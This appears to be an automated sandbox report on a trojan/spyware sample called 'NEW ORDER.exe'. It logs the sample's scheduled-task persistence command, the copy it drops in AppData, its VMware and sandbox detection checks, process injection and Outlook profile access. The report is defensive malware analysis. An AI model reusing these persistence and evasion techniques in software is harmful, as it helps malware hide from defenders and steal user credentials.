                    Source: NEW ORDER.exe, 00000000.00000002.511865980.0000000006D20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs NEW ORDER.exe
                    Source: NEW ORDER.exe, 00000000.00000003.468889983.0000000002C62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs NEW ORDER.exe
                    Source: NEW ORDER.exeBinary or memory string: OriginalFilename vs NEW ORDER.exe
                    Source: NEW ORDER.exe, 00000003.00000000.486980862.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelcEMFcmuWHYdtRtSGZcssuRBY.exe4 vs NEW ORDER.exe
                    Source: NEW ORDER.exe, 00000003.00000002.701035953.0000000000B58000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs NEW ORDER.exe
                    Source: NEW ORDER.exeBinary or memory string: OriginalFilename73tNI.exe8 vs NEW ORDER.exe
                    Source: NEW ORDER.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: IrUpgWwdRBJK.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: NEW ORDER.exeVirustotal: Detection: 37%
                    Source: NEW ORDER.exeReversingLabs: Detection: 41%
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile read: C:\Users\user\Desktop\NEW ORDER.exeJump to behavior
                    Source: NEW ORDER.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\NEW ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\NEW ORDER.exe "C:\Users\user\Desktop\NEW ORDER.exe"
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IrUpgWwdRBJK" /XML "C:\Users\user\AppData\Local\Temp\tmp354B.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Users\user\Desktop\NEW ORDER.exe {path}
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IrUpgWwdRBJK" /XML "C:\Users\user\AppData\Local\Temp\tmp354B.tmp
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Users\user\Desktop\NEW ORDER.exe {path}
                    Source: C:\Users\user\Desktop\NEW ORDER.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile created: C:\Users\user\AppData\Roaming\IrUpgWwdRBJK.exeJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile created: C:\Users\user\AppData\Local\Temp\tmp354B.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/3@1/1
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\NEW ORDER.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\NEW ORDER.exeMutant created: \Sessions\1\BaseNamedObjects\joqQyuVknjlAfEO
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_01
                    Source: 3.0.NEW ORDER.exe.400000.6.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 3.0.NEW ORDER.exe.400000.6.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 3.0.NEW ORDER.exe.400000.8.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 3.0.NEW ORDER.exe.400000.8.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 3.0.NEW ORDER.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 3.0.NEW ORDER.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\NEW ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: NEW ORDER.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: NEW ORDER.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_003076BF push es; retf
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_003076A7 push es; retf
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_05695539 push eax; mov dword ptr [esp], ecx
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_056954A8 push eax; mov dword ptr [esp], ecx
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 3_2_006F76A7 push es; retf
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 3_2_006F76BF push es; retf
                    Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 3_2_05C6F008 pushad ; retn 05C0h
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.8467316034
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.8467316034
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile created: C:\Users\user\AppData\Roaming\IrUpgWwdRBJK.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IrUpgWwdRBJK" /XML "C:\Users\user\AppData\Local\Temp\tmp354B.tmp
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 7016, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: NEW ORDER.exe, 00000000.00000002.491114236.0000000002611000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.497460964.0000000002B80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: NEW ORDER.exe, 00000000.00000002.491114236.0000000002611000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.497460964.0000000002B80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\NEW ORDER.exe TID: 3392Thread sleep time: -24903104499507879s >= -30000s
                    Source: C:\Users\user\Desktop\NEW ORDER.exe TID: 6400Thread sleep count: 4860 > 30
                    Source: C:\Users\user\Desktop\NEW ORDER.exe TID: 6400Thread sleep count: 3909 > 30
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\NEW ORDER.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\NEW ORDER.exeWindow / User API: threadDelayed 4860
                    Source: C:\Users\user\Desktop\NEW ORDER.exeWindow / User API: threadDelayed 3909
                    Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeThread delayed: delay time: 922337203685477
                    Source: NEW ORDER.exe, 00000000.00000002.489996174.00000000009A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                    Source: NEW ORDER.exe, 00000000.00000002.497460964.0000000002B80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                    Source: NEW ORDER.exe, 00000000.00000002.497460964.0000000002B80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: NEW ORDER.exe, 00000000.00000002.497460964.0000000002B80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: NEW ORDER.exe, 00000000.00000002.497460964.0000000002B80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: NEW ORDER.exe, 00000000.00000002.497460964.0000000002B80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: NEW ORDER.exe, 00000000.00000002.497460964.0000000002B80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: NEW ORDER.exe, 00000000.00000002.497460964.0000000002B80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: NEW ORDER.exe, 00000000.00000002.497460964.0000000002B80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: NEW ORDER.exe, 00000000.00000002.497460964.0000000002B80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\NEW ORDER.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\NEW ORDER.exeMemory written: C:\Users\user\Desktop\NEW ORDER.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IrUpgWwdRBJK" /XML "C:\Users\user\AppData\Local\Temp\tmp354B.tmp
                    Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Users\user\Desktop\NEW ORDER.exe {path}
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Users\user\Desktop\NEW ORDER.exe VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
